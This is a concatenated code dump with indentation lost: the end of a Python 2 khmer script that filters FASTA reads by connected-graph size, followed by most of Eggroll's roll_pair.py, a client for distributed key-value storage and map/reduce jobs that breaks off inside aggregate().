recordlist = inq.get(True, 1)
except Queue.Empty:
continue
x = []
for record in recordlist:
kmer = record['sequence'][:K]
size = ht.calc_connected_graph_size(kmer, THRESHOLD)
if size >= THRESHOLD:
x.append(record)
outq.put(x)
worker_count -= 1
def write(outq, outfp):
global worker_count
while worker_count > 0 or not outq.empty():
try:
recordlist = outq.get(True, 1)
except Queue.Empty:
continue
for record in recordlist:
outfp.write('>%s\n%s\n' % (record['name'], record['sequence']))
def main():
global done, worker_count
done = False
worker_count = 0
infile = sys.argv[1]
outfile = infile + '.graphsize2'
print 'creating ht'
ht = khmer.new_hashbits(K, HASHTABLE_SIZE, 1)
print 'eating fa', infile
total_reads, n_consumed = ht.consume_fasta(infile)
outfp = open(outfile, 'w')
inqueue = Queue.Queue(50)
outqueue = Queue.Queue(50)
# worker and writer threads
for i in range(WORKER_THREADS):
t = threading.Thread(target=process, args=(inqueue, outqueue, ht))
worker_count += 1
t.start()
threading.Thread(target=write, args=(outqueue, outfp)).start()
# main thread
x = []
i = 0
for n, record in enumerate(screed.fasta.fasta_iter(open(infile))):
if n % 10000 == 0:
print '...', n
x.append(record)
i += 1
if i > GROUPSIZE:
inqueue.put(x)
x = []
i = 0
inqueue.put(x)
done = True
if __name__ == '__main__':
main()
|
roll_pair.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 - now, Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import uuid
from concurrent.futures import wait, FIRST_EXCEPTION
from threading import Thread
from eggroll.core.aspects import _method_profile_logger
from eggroll.core.client import CommandClient
from eggroll.core.command.command_model import CommandURI
from eggroll.core.conf_keys import SessionConfKeys
from eggroll.core.constants import StoreTypes, SerdesTypes, PartitionerTypes, \
SessionStatus
from eggroll.core.datastructure.broker import FifoBroker
from eggroll.core.meta_model import ErStoreLocator, ErJob, ErStore, ErFunctor, \
ErTask, ErPair, ErPartition
from eggroll.core.serdes import cloudpickle
from eggroll.core.session import ErSession
from eggroll.core.utils import generate_job_id, generate_task_id
from eggroll.core.utils import string_to_bytes, hash_code
from eggroll.roll_pair import create_serdes
from eggroll.roll_pair.transfer_pair import TransferPair, BatchBroker
from eggroll.roll_pair.utils.gc_utils import GcRecorder
from eggroll.roll_pair.utils.pair_utils import partitioner
from eggroll.utils.log_utils import get_logger
L = get_logger()
def runtime_init(session: ErSession):
rpc = RollPairContext(session=session)
return rpc
class RollPairContext(object):
def __init__(self, session: ErSession):
if session.get_session_meta()._status != SessionStatus.ACTIVE:
raise Exception(f"session:{session.get_session_id()} is not available, init first!")
self.__session = session
self.session_id = session.get_session_id()
self.default_store_type = StoreTypes.ROLLPAIR_LMDB
self.default_store_serdes = SerdesTypes.PICKLE
self.deploy_mode = session.get_option(SessionConfKeys.CONFKEY_SESSION_DEPLOY_MODE)
self.__session_meta = session.get_session_meta()
self.__session.add_exit_task(self.context_gc)
self.rpc_gc_enable = True
self.gc_recorder = GcRecorder(self)
self.__command_client = CommandClient()
def set_store_type(self, store_type: str):
self.default_store_type = store_type
def set_store_serdes(self, serdes_type: str):
self.default_store_serdes = serdes_type
def set_session_gc_enable(self):
self.rpc_gc_enable = True
def set_session_gc_disable(self):
self.rpc_gc_enable = False
def get_session(self):
return self.__session
def get_roll(self):
ret = self.__session._rolls[0]
if not ret._command_endpoint._host or not ret._command_endpoint._port:
L.error(f"invalid roll processor:{ret}, session_meta:{self.__session_meta}")
raise ValueError(f"invalid roll endpoint:{ret}")
return ret
def context_gc(self):
self.gc_recorder.stop()
if self.gc_recorder.gc_recorder is None or len(self.gc_recorder.gc_recorder) == 0:
L.info("rp context gc_recorder is None or empty!")
return
for k, v in (self.gc_recorder.gc_recorder.items()):
L.debug("before exit the task:{} cleaning item:{}".format(self.session_id, k))
name = k
rp = self.load(namespace=self.session_id, name=name)
rp.destroy()
def route_to_egg(self, partition: ErPartition):
return self.__session.route_to_egg(partition)
def populate_processor(self, store: ErStore):
populated_partitions = list()
for p in store._partitions:
pp = ErPartition(id=p._id, store_locator=p._store_locator, processor=self.route_to_egg(p))
populated_partitions.append(pp)
return ErStore(store_locator=store._store_locator, partitions=populated_partitions, options=store._options)
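    # load() resolves (or, with create_if_missing, creates) a distributed
    # key-value store in the cluster and wraps it as a RollPair. A minimal,
    # illustrative sketch (option keys taken from the handling below):
    #
    #     rp = rpc.load(namespace='demo_ns', name='demo_table',
    #                   options={'total_partitions': 4,
    #                            'store_type': StoreTypes.ROLLPAIR_LMDB})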
def load(self, namespace=None, name=None, options: dict = None):
if options is None:
options = {}
store_type = options.get('store_type', self.default_store_type)
total_partitions = options.get('total_partitions', 1)
partitioner = options.get('partitioner', PartitionerTypes.BYTESTRING_HASH)
store_serdes = options.get('serdes', self.default_store_serdes)
create_if_missing = options.get('create_if_missing', True)
# todo:1: add combine options to pass it through
store_options = self.__session.get_all_options()
store_options.update(options)
final_options = store_options.copy()
# TODO:1: tostring in er model
if 'create_if_missing' in final_options:
del final_options['create_if_missing']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'include_key' in final_options:
del final_options['include_key']
if 'total_partitions' in final_options:
del final_options['total_partitions']
if 'name' in final_options:
del final_options['name']
if 'namespace' in final_options:
del final_options['namespace']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'keys_only' in final_options:
del final_options['keys_only']
# TODO:0: add 'error_if_exist, persistent / default store type'
L.info("final_options:{}".format(final_options))
store = ErStore(
store_locator=ErStoreLocator(
store_type=store_type,
namespace=namespace,
name=name,
total_partitions=total_partitions,
partitioner=partitioner,
serdes=store_serdes),
options=final_options)
if create_if_missing:
result = self.__session._cluster_manager_client.get_or_create_store(store)
else:
result = self.__session._cluster_manager_client.get_store(store)
if result is None:
raise EnvironmentError(
"result is None, please check whether the store:{} has been created before".format(store))
return RollPair(self.populate_processor(result), self)
# TODO:1: separates load parameters and put all parameters
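    # parallelize() loads (or creates) a store -- in-memory by default -- and
    # bulk-writes the given data into it via put_all. Illustrative sketch:
    #
    #     rp = rpc.parallelize(range(10), options={'include_key': False})
    #     rp2 = rpc.parallelize([('a', 1), ('b', 2)], options={'include_key': True})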
def parallelize(self, data, options: dict = None):
if options is None:
options = {}
namespace = options.get("namespace", None)
name = options.get("name", None)
options['store_type'] = options.get("store_type", StoreTypes.ROLLPAIR_IN_MEMORY)
create_if_missing = options.get("create_if_missing", True)
if namespace is None:
namespace = self.session_id
if name is None:
name = str(uuid.uuid1())
rp = self.load(namespace=namespace, name=name, options=options)
return rp.put_all(data, options=options)
    '''store name only supports full names and wildcard patterns: *, *abc, abc* and a*c'''
def cleanup(self, namespace, name, options: dict = None):
if not namespace:
raise ValueError('namespace cannot be blank')
L.info(f'cleaning up namespace={namespace}, name={name}')
if options is None:
options = {}
total_partitions = options.get('total_partitions', 1)
partitioner = options.get('partitioner', PartitionerTypes.BYTESTRING_HASH)
store_serdes = options.get('serdes', self.default_store_serdes)
if name == '*':
store_type = options.get('store_type', '*')
L.info(f'cleaning up whole store_type={store_type}, namespace={namespace}, name={name}')
er_store = ErStore(store_locator=ErStoreLocator(namespace=namespace,
name=name,
store_type=store_type))
job_id = generate_job_id(namespace, tag=RollPair.CLEANUP)
job = ErJob(id=job_id,
name=RollPair.DESTROY,
inputs=[er_store],
options=options)
args = list()
cleanup_partitions = [ErPartition(id=-1, store_locator=er_store._store_locator)]
for server_node, eggs in self.__session._eggs.items():
egg = eggs[0]
task = ErTask(id=generate_task_id(job_id, egg._command_endpoint._host),
name=job._name,
inputs=cleanup_partitions,
job=job)
args.append(([task], egg._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErTask],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
for future in futures:
result = future.result()
self.get_session()._cluster_manager_client.delete_store(er_store)
else:
# todo:1: add combine options to pass it through
store_options = self.__session.get_all_options()
store_options.update(options)
final_options = store_options.copy()
# TODO:1: tostring in er model
if 'create_if_missing' in final_options:
del final_options['create_if_missing']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'include_key' in final_options:
del final_options['include_key']
if 'total_partitions' in final_options:
del final_options['total_partitions']
if 'name' in final_options:
del final_options['name']
if 'namespace' in final_options:
del final_options['namespace']
# TODO:1: remove these codes by adding to string logic in ErStore
if 'keys_only' in final_options:
del final_options['keys_only']
# TODO:0: add 'error_if_exist, persistent / default store type'
L.info("final_options:{}".format(final_options))
store = ErStore(
store_locator=ErStoreLocator(
store_type=StoreTypes.ROLLPAIR_LMDB,
namespace=namespace,
name=name,
total_partitions=total_partitions,
partitioner=partitioner,
serdes=store_serdes),
options=final_options)
results = self.__session._cluster_manager_client.get_store_from_namespace(store)
L.debug('res:{}'.format(results._stores))
if results._stores is not None:
L.debug("item count:{}".format(len(results._stores)))
for item in results._stores:
L.debug("item namespace:{} name:{}".format(item._store_locator._namespace,
item._store_locator._name))
rp = RollPair(er_store=item, rp_ctx=self)
rp.destroy()
def default_partitioner(k):
return 0
def default_egg_router(k):
return 0
class RollPair(object):
ROLL_PAIR_URI_PREFIX = 'v1/roll-pair'
EGG_PAIR_URI_PREFIX = 'v1/egg-pair'
RUN_JOB = 'runJob'
RUN_TASK = 'runTask'
AGGREGATE = 'aggregate'
COLLAPSE_PARTITIONS = 'collapsePartitions'
CLEANUP = 'cleanup'
COUNT = 'count'
DELETE = "delete"
DESTROY = "destroy"
FILTER = 'filter'
FLAT_MAP = 'flatMap'
GET = "get"
GET_ALL = "getAll"
GLOM = 'glom'
JOIN = 'join'
MAP = 'map'
MAP_PARTITIONS = 'mapPartitions'
MAP_VALUES = 'mapValues'
PUT = "put"
PUT_ALL = "putAll"
REDUCE = 'reduce'
SAMPLE = 'sample'
SUBTRACT_BY_KEY = 'subtractByKey'
UNION = 'union'
SERIALIZED_NONE = cloudpickle.dumps(None)
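    # The string constants above are command tags: most become ErJob/ErTask
    # names (e.g. MAP, REDUCE), while RUN_JOB/RUN_TASK are appended to
    # ROLL_PAIR_URI_PREFIX / EGG_PAIR_URI_PREFIX to build the CommandURI each
    # method sends to the roll or egg processors.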
def __setstate__(self, state):
self.gc_enable = None
pass
def __getstate__(self):
pass
def __init__(self, er_store: ErStore, rp_ctx: RollPairContext):
if not rp_ctx:
raise ValueError('rp_ctx cannot be None')
self.__store = er_store
self.ctx = rp_ctx
self.__command_serdes = SerdesTypes.PROTOBUF
self.__roll_pair_master = self.ctx.get_roll()
self.__command_client = CommandClient()
        self.functor_serdes = create_serdes(SerdesTypes.CLOUD_PICKLE)
self.value_serdes = self.get_store_serdes()
self.key_serdes = self.get_store_serdes()
self.partitioner = partitioner(hash_code, self.__store._store_locator._total_partitions)
self.egg_router = default_egg_router
self.__session_id = self.ctx.session_id
self.gc_enable = rp_ctx.rpc_gc_enable
self.gc_recorder = rp_ctx.gc_recorder
self.gc_recorder.record(er_store)
self.destroyed = False
def __del__(self):
if "EGGROLL_GC_DISABLE" in os.environ and os.environ["EGGROLL_GC_DISABLE"] == '1':
L.debug("global RollPair gc is disable")
return
if not hasattr(self, 'gc_enable') \
or not hasattr(self, 'ctx'):
return
if not self.gc_enable:
            L.info('session:{} gc not enabled'.format(self.__session_id))
return
if self.destroyed:
return
if self.ctx.get_session().is_stopped():
L.debug('session:{} has already been stopped'.format(self.__session_id))
return
L.debug(f"del obj addr:{self} calling")
self.ctx.gc_recorder.decrease_ref_count(self.__store)
def __repr__(self):
return f'<RollPair(_store={self.__store}) at {hex(id(self))}>'
def __repartition_with(self, other):
self_partition = self.get_partitions()
other_partition = other.get_partitions()
if other_partition != self_partition:
self_name = self.get_name()
self_count = self.count()
other_name = other.get_name()
other_count = other.count()
L.info(f"repartition start: partitions of rp: {self_name}: {self_partition}, "
f"other: {other_name}: {other_partition}, repartitioning")
if self_count <= other_count:
shuffle_rp = self
shuffle_rp_count = self_count
shuffle_rp_name = self_name
shuffle_rp_partition = self_partition
not_shuffle_rp = other
not_shuffle_rp_count = other_count
not_shuffle_rp_name = other_name
not_shuffle_rp_partition = other_partition
else:
not_shuffle_rp = self
not_shuffle_rp_count = self_count
not_shuffle_rp_name = self_name
not_shuffle_rp_partition = self_partition
shuffle_rp = other
shuffle_rp_count = other_count
shuffle_rp_name = other_name
shuffle_rp_partition = other_partition
L.debug(f"repatition selection: rp: {shuffle_rp_name} count:{shuffle_rp_count} "
f"<= rp: {not_shuffle_rp_name} count:{not_shuffle_rp_count}. "
f"repartitioning {shuffle_rp_name}")
store = ErStore(store_locator=ErStoreLocator(store_type=shuffle_rp.get_store_type(),
namespace=shuffle_rp.get_namespace(),
name=str(uuid.uuid1()),
total_partitions=not_shuffle_rp_partition))
res_rp = shuffle_rp.map(lambda k, v: (k, v), output=store)
res_rp.disable_gc()
L.debug(f"repartition end: rp to shuffle: {shuffle_rp_name}, "
f"count: {shuffle_rp_count}, partitions: {shuffle_rp_partition}; "
f"rp NOT shuffle: {not_shuffle_rp_name}, "
f"count: {not_shuffle_rp_count}, partitions: {not_shuffle_rp_partition}' "
f"res rp: {res_rp.get_name()}, "
f"count: {res_rp.count()}, partitions :{res_rp.get_partitions()}")
store_shuffle = res_rp.get_store()
return [store_shuffle, other.get_store()] if self_count <= other_count \
else [self.get_store(), store_shuffle]
else:
return [self.__store, other.__store]
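    # Repartition strategy used by the binary ops (join/union/subtract_by_key):
    # when the two RollPairs disagree on partition count, the one with fewer
    # records is shuffled (via an identity map) into a new store with the other
    # side's partition count, so both inputs end up co-partitioned.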
def enable_gc(self):
self.gc_enable = True
def disable_gc(self):
self.gc_enable = False
def get_store_serdes(self):
return create_serdes(self.__store._store_locator._serdes)
def get_partitions(self):
return self.__store._store_locator._total_partitions
def get_name(self):
return self.__store._store_locator._name
def get_namespace(self):
return self.__store._store_locator._namespace
def get_store(self):
return self.__store
def get_store_type(self):
return self.__store._store_locator._store_type
def kv_to_bytes(self, **kwargs):
use_serialize = kwargs.get("use_serialize", True)
        # check key presence with "in kwargs" rather than testing values against None
if "k" in kwargs and "v" in kwargs:
k, v = kwargs["k"], kwargs["v"]
return (self.value_serdes.serialize(k), self.value_serdes.serialize(v)) if use_serialize \
else (string_to_bytes(k), string_to_bytes(v))
elif "k" in kwargs:
k = kwargs["k"]
return self.value_serdes.serialize(k) if use_serialize else string_to_bytes(k)
elif "v" in kwargs:
v = kwargs["v"]
return self.value_serdes.serialize(v) if use_serialize else string_to_bytes(v)
"""
storage api
"""
@_method_profile_logger
def get(self, k, options: dict = None):
if options is None:
options = {}
L.debug(f"get k: {k}")
k = create_serdes(self.__store._store_locator._serdes).serialize(k)
er_pair = ErPair(key=k, value=None)
outputs = []
value = None
partition_id = self.partitioner(k)
egg = self.ctx.route_to_egg(self.__store._partitions[partition_id])
L.info(f"partitions count: {self.__store._store_locator._total_partitions}, target partition: {partition_id}, endpoint: {egg._command_endpoint}")
inputs = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
output = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
job_id = generate_job_id(self.__session_id, RollPair.GET)
job = ErJob(id=job_id,
name=RollPair.GET,
inputs=[self.__store],
outputs=outputs,
functors=[ErFunctor(body=cloudpickle.dumps(er_pair))])
task = ErTask(id=generate_task_id(job_id, partition_id),
name=RollPair.GET,
inputs=inputs,
outputs=output,
job=job)
job_resp = self.__command_client.simple_sync_send(
input=task,
output_type=ErPair,
endpoint=egg._command_endpoint,
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'),
serdes_type=self.__command_serdes
)
return self.value_serdes.deserialize(job_resp._value) if job_resp._value != b'' else None
@_method_profile_logger
def put(self, k, v, options: dict = None):
if options is None:
options = {}
k, v = create_serdes(self.__store._store_locator._serdes).serialize(k), \
create_serdes(self.__store._store_locator._serdes).serialize(v)
er_pair = ErPair(key=k, value=v)
outputs = []
partition_id = self.partitioner(k)
egg = self.ctx.route_to_egg(self.__store._partitions[partition_id])
inputs = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
output = [ErPartition(id=0, store_locator=self.__store._store_locator)]
job_id = generate_job_id(self.__session_id, RollPair.PUT)
job = ErJob(id=job_id,
name=RollPair.PUT,
inputs=[self.__store],
outputs=outputs,
functors=[ErFunctor(body=cloudpickle.dumps(er_pair))])
task = ErTask(id=generate_task_id(job_id, partition_id),
name=RollPair.PUT,
inputs=inputs,
outputs=output,
job=job)
L.info("start send req")
job_resp = self.__command_client.simple_sync_send(
input=task,
output_type=ErPair,
endpoint=egg._command_endpoint,
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'),
serdes_type=self.__command_serdes
)
L.info("get resp:{}".format((job_resp._value)))
value = job_resp._value
return value
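    # Minimal single-key usage sketch (assumes rp was obtained from
    # RollPairContext.load or parallelize):
    #
    #     rp.put('k1', 'v1')
    #     v = rp.get('k1')        # -> 'v1'
    #     rp.delete('k1')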
@_method_profile_logger
def get_all(self, options: dict = None):
if options is None:
options = {}
L.info('get all functor')
job_id = generate_job_id(self.__session_id, RollPair.GET_ALL)
def send_command():
job = ErJob(id=job_id,
name=RollPair.GET_ALL,
inputs=[self.__store],
outputs=[self.__store],
functors=[])
result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=SerdesTypes.PROTOBUF)
return result
send_command()
populated_store = self.ctx.populate_processor(self.__store)
transfer_pair = TransferPair(transfer_id=job_id)
done_cnt = 0
for k, v in transfer_pair.gather(populated_store):
done_cnt += 1
yield self.key_serdes.deserialize(k), self.value_serdes.deserialize(v)
L.debug(f"get_all count:{done_cnt}")
@_method_profile_logger
def put_all(self, items, output=None, options: dict = None):
if options is None:
options = {}
include_key = options.get("include_key", True)
job_id = generate_job_id(self.__session_id, RollPair.PUT_ALL)
# TODO:1: consider multiprocessing scenario. parallel size should be sent to egg_pair to set write signal count
def send_command():
job = ErJob(id=job_id,
name=RollPair.PUT_ALL,
inputs=[self.__store],
outputs=[self.__store],
functors=[])
result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=SerdesTypes.PROTOBUF)
return result
th = Thread(target=send_command, name=f'roll_pair-send_command-{job_id}')
th.start()
populated_store = self.ctx.populate_processor(self.__store)
shuffler = TransferPair(job_id)
broker = FifoBroker()
bb = BatchBroker(broker)
scatter_future = shuffler.scatter(broker, self.partitioner, populated_store)
key_serdes = self.key_serdes
value_serdes = self.value_serdes
try:
if include_key:
for k, v in items:
bb.put(item=(key_serdes.serialize(k), value_serdes.serialize(v)))
else:
k = 0
for v in items:
bb.put(item=(key_serdes.serialize(k), value_serdes.serialize(v)))
k += 1
finally:
bb.signal_write_finish()
scatter_results = scatter_future.result()
L.debug(f"scatter_results: {scatter_results}")
th.join()
return RollPair(populated_store, self.ctx)
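    # put_all streams (key, value) pairs into the store: a RUN_JOB command is
    # sent on a side thread so the egg side can accept transfers, while this
    # thread serializes items into a FifoBroker that TransferPair.scatter
    # partitions and ships out. Illustrative sketch:
    #
    #     rp = rp.put_all([('a', 1), ('b', 2)])                       # include_key=True
    #     rp = rp.put_all([1, 2, 3], options={'include_key': False})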
@_method_profile_logger
def count(self):
total_partitions = self.__store._store_locator._total_partitions
job_id = generate_job_id(self.__session_id, tag=RollPair.COUNT)
job = ErJob(id=job_id,
name=RollPair.COUNT,
inputs=[self.ctx.populate_processor(self.__store)])
args = list()
for i in range(total_partitions):
partition_input = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[partition_input],
job=job)
args.append(([task], partition_input._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
done = wait(futures, return_when=FIRST_EXCEPTION).done
result = 0
for future in done:
pair = future.result()[0]
result += self.functor_serdes.deserialize(pair._value)
return result
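    # count() fans one COUNT task out to every partition and sums the
    # per-partition counts returned by the egg processors on the client side.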
# todo:1: move to command channel to utilize batch command
@_method_profile_logger
def destroy(self):
if len(self.ctx.get_session()._cluster_manager_client.get_store(self.get_store())._partitions) == 0:
L.info(f"store:{self.get_store()} has been destroyed before")
raise ValueError(f"store:{self.get_store()} has been destroyed before")
total_partitions = self.__store._store_locator._total_partitions
job = ErJob(id=generate_job_id(self.__session_id, RollPair.DESTROY),
name=RollPair.DESTROY,
inputs=[self.__store],
outputs=[self.__store],
functors=[])
job_resp = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
self.ctx.get_session()._cluster_manager_client.delete_store(self.__store)
L.info(f'{RollPair.DESTROY}: {self.__store}')
self.destroyed = True
@_method_profile_logger
def delete(self, k, options: dict = None):
if options is None:
options = {}
key = create_serdes(self.__store._store_locator._serdes).serialize(k)
er_pair = ErPair(key=key, value=None)
outputs = []
value = None
partition_id = self.partitioner(key)
egg = self.ctx.route_to_egg(self.__store._partitions[partition_id])
        L.info(f"delete: target egg endpoint: {egg._command_endpoint}")
        L.info(f"partitions count: {self.__store._store_locator._total_partitions}")
inputs = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
output = [ErPartition(id=partition_id, store_locator=self.__store._store_locator)]
job_id = generate_job_id(self.__session_id, RollPair.DELETE)
job = ErJob(id=job_id,
name=RollPair.DELETE,
inputs=[self.__store],
outputs=outputs,
functors=[ErFunctor(body=cloudpickle.dumps(er_pair))])
task = ErTask(id=generate_task_id(job_id, partition_id), name=RollPair.DELETE, inputs=inputs, outputs=output, job=job)
L.info("start send req")
job_resp = self.__command_client.simple_sync_send(
input=task,
output_type=ErPair,
endpoint=egg._command_endpoint,
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'),
serdes_type=self.__command_serdes
)
@_method_profile_logger
def take(self, n: int, options: dict = None):
if options is None:
options = {}
if n <= 0:
n = 1
keys_only = options.get("keys_only", False)
ret = []
count = 0
for item in self.get_all():
if keys_only:
if item:
ret.append(item[0])
else:
ret.append(None)
else:
ret.append(item)
count += 1
if count == n:
break
return ret
@_method_profile_logger
def first(self, options: dict = None):
if options is None:
options = {}
resp = self.take(1, options=options)
if resp:
return resp[0]
else:
return None
@_method_profile_logger
def save_as(self, name, namespace, partition, options: dict = None):
if partition <= 0:
            raise ValueError('partition cannot be <= 0')
if options is None:
options = {}
store_type = options.get('store_type', self.ctx.default_store_type)
if partition == self.get_partitions():
store = ErStore(store_locator=ErStoreLocator(store_type=store_type, namespace=namespace,
name=name, total_partitions=self.get_partitions()))
return self.map_values(lambda v: v, output=store)
else:
store = ErStore(store_locator=ErStoreLocator(store_type=store_type, namespace=namespace,
name=name, total_partitions=partition))
return self.map(lambda k, v: (k, v), output=store)
"""
computing api
"""
@_method_profile_logger
def map_values(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.MAP_VALUES, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
# todo:1: options issues. refer to line 77
final_options = {}
final_options.update(self.__store._options)
final_options.update(options)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.MAP_VALUES),
name=RollPair.MAP_VALUES,
inputs=[self.__store],
outputs=outputs,
functors=[functor],
options=final_options)
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def map(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.MAP, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.MAP),
name=RollPair.MAP,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def map_partitions(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.MAP_PARTITIONS, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.MAP_PARTITIONS),
name=RollPair.MAP_PARTITIONS,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def collapse_partitions(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.COLLAPSE_PARTITIONS, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.COLLAPSE_PARTITIONS),
name=RollPair.COLLAPSE_PARTITIONS,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def flat_map(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.FLAT_MAP, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.FLAT_MAP),
name=RollPair.FLAT_MAP,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def reduce(self, func, output=None, options: dict = None):
total_partitions = self.__store._store_locator._total_partitions
job_id = generate_job_id(self.__session_id, tag=RollPair.REDUCE)
serialized_func = ErFunctor(name=RollPair.REDUCE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
job = ErJob(id=job_id,
name=RollPair.REDUCE,
inputs=[self.ctx.populate_processor(self.__store)],
functors=[serialized_func])
args = list()
for i in range(total_partitions):
partition_input = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[partition_input],
job=job)
args.append(([task], partition_input._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
done = wait(futures, return_when=FIRST_EXCEPTION).done
result = None
first = True
for future in done:
pair = future.result()[0]
seq_op_result = self.functor_serdes.deserialize(pair._value)
if seq_op_result is not None:
if not first:
result = func(result, seq_op_result)
else:
result = seq_op_result
first = False
return result
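    # reduce() runs func inside each partition (on the eggs), then applies the
    # same func again here to fold the per-partition results into one value, so
    # func should be associative (and order-insensitive). Illustrative sketch:
    #
    #     total = rp.reduce(lambda a, b: a + b)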
@_method_profile_logger
def aggregate(self, zero_value, seq_op, comb_op, output=None, options: dict = None):
total_partitions = self.__store._store_locator._total_partitions
job_id = generate_job_id(self.__session_id, tag=RollPair.AGGREGATE)
serialized_zero_value = ErFunctor(name=RollPair.AGGREGATE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(zero_value))
serialized_seq_op = ErFunctor(name=RollPair.AGGREGATE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(seq_op))
job = ErJob(id=job_id,
name=RollPair.AGGREGATE,
inputs=[self.ctx.populate_processor(self.__store)],
functors=[serialized_zero_value, serialized_seq_op])
args = list()
for i in range(total_partitions):
partition_input = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[partition_input],
job=job)
args.append(([task], partition_input._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
